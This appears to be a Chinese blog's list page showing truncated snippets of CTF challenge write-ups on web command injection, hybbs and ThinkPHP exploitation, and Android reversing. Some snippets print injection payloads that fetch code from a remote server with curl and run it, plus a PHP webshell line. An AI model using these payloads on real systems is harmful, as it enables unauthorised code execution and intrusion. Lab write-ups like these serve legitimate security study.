- 博客(8)
- 收藏
- 关注
原创 CTF-伟大宝宝的保障-WP
CTF-伟大宝宝的保障-WP题目来自BMZCTF,打开题目是hybbs2.3.2的,直接百度搜索相关漏洞即可利用漏洞:1.越权遍历给admin发私信,得到密码baobao(后9位需爆破)2.修改全局配置-上传后缀加php(这个方法已经失效,题目被改过)3.利用插件插入php代码解题过程首先越权给admin发送私信,其实这里算是遍历admin的uid为1,尝试发送得到一个密码反馈进行爆破得到admin密码为baobao123456789,进入后台插件新增插入恶意代码:111','
2020-11-18 10:21:56
521
2
原创 CTF-flag验证器-Wp
CTF-flag验证器-Wp这题考点是异或xor解题过程拿到flag.rar后就是解压提到dex文件,然后反编译得到jar全文搜索flag字符你会发现一个Encrypedflag数组,这是flagprivate int[] Encrypedflag = new int[] { 25561, 10, 25556, 12, 25544, 54, 25543, 28, 25553, 94, 25552, 11, 25579, 101, 25513, 73, 25528, 5
2020-10-30 13:52:58
796
原创 CTF-simple_moblie安卓逆向-Wp
CTF-simple_moblie-Wp这个题目纯考代码,没有难点,签到题难度解题思路拿到压缩包解压,反编译得到jar文件这个题目满足三点即可得到flag第一点:满足15第二点:满足字符串第三点: 坐标对应得到15位数字:435890157614875结果输入坐标数字得到flag...
2020-10-30 10:25:10
430
原创 CTF-内网1-Wp
CTF-内网1-wp题目考点是tp命令执行+反弹出网+内网渗透+提权解题过程这个题目花了一天时间才弄完上半天:拿到环境后打开tp5的命令执行,一开始想着命令执行反弹shell,但是没有成功后面就开始翻文件,数据库配置文件,内网吗,应该要继续搞这台连接数据库后,是个假的Sa吧,不过还好可以执行命令,查看了一下有好几个用户呢,hack,test,administrator,guest等等,不过这都不是重点(我还爆破了hack跟test,想着是不是这两个用户提权到administrator),居然p
2020-10-30 00:14:00
717
原创 CTF-小明的演讲-Wp
CTF-小明的演讲-Wp这个题目考的是文件分离+utf8文件头+中文电码+base64## 解题过程首先下载t.pptx,下意识的改成压缩包t.zip试试,可以发现解压成功然后我们翻到一个xiaoming.zip,然后再解压得到flag.php和两个密文txt两个密码都是中文电脑,第二部分打开是乱码,用windex修改文件头位FEFF显示中文然后把第一部分密文解密为:我是密码使用在线解密:https://dianma.51240.com/,两个密码结合就是:我是密码我也是密码结果解
2020-10-29 23:54:46
620
原创 CTF-shell_exec-Wp
CTF-shell_exec-Wp题目是这样的,ping命令测试查看html源代码看到一个tip解题过程一经过大量测试目的其实就是执行cat /flag但是发现有过滤了空格,这里我们$IFS$9代替我是利用echo curl http://xxxxx.com/1.php >a ,然后执行sh a这样拿shell的,需要绕过php最终poc:#第一条,把vps的<?php system('cat /flag')>写进去a`echo$IFS$9curl$IFS$9112h
2020-10-29 20:31:38
1613
原创 CTF-smail安卓逆向-Wp
CTF-smail-WP这是一题安卓逆向题目,不难直接打印。解题过程拿到apk后进行反编译得到jar,用jdu打开康康只有两个文件有用,第三个jar感觉没用大致发现第一jar是注册了一个广播第二段代码是跟flag有关直接把代码copy出来用idea直接调试,满parnmint=0,写个类调用第二个jar就ojbk了是不是很简单--------------------------华丽分割线--------------------------------结果说干就干,得到flag
2020-10-29 15:05:50
483
原创 CTF-Rcee命令执行-Wp
CTF-Rcee-WP这个题目挺考验你的积累与耐心哈哈哈我表示重启环境十几次才做好题目代码考点这里考点是:ls -t>a续行来突破限制我是在vps上创建一个文件,然后利用ip转换成其他进制来达到目的把curl 2033630300 >1.php利用ls -t >a写入a文件,然后再利用sh a执行命令可以发现我们vps的文件内容已经被目标机器写入了a.php访问a.php看看神奇的东西哈哈哈哈哈哈,表示第一次做这种题目,很好玩接下来就没技术含量了<?
2020-10-29 14:02:18
356
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人
RSS订阅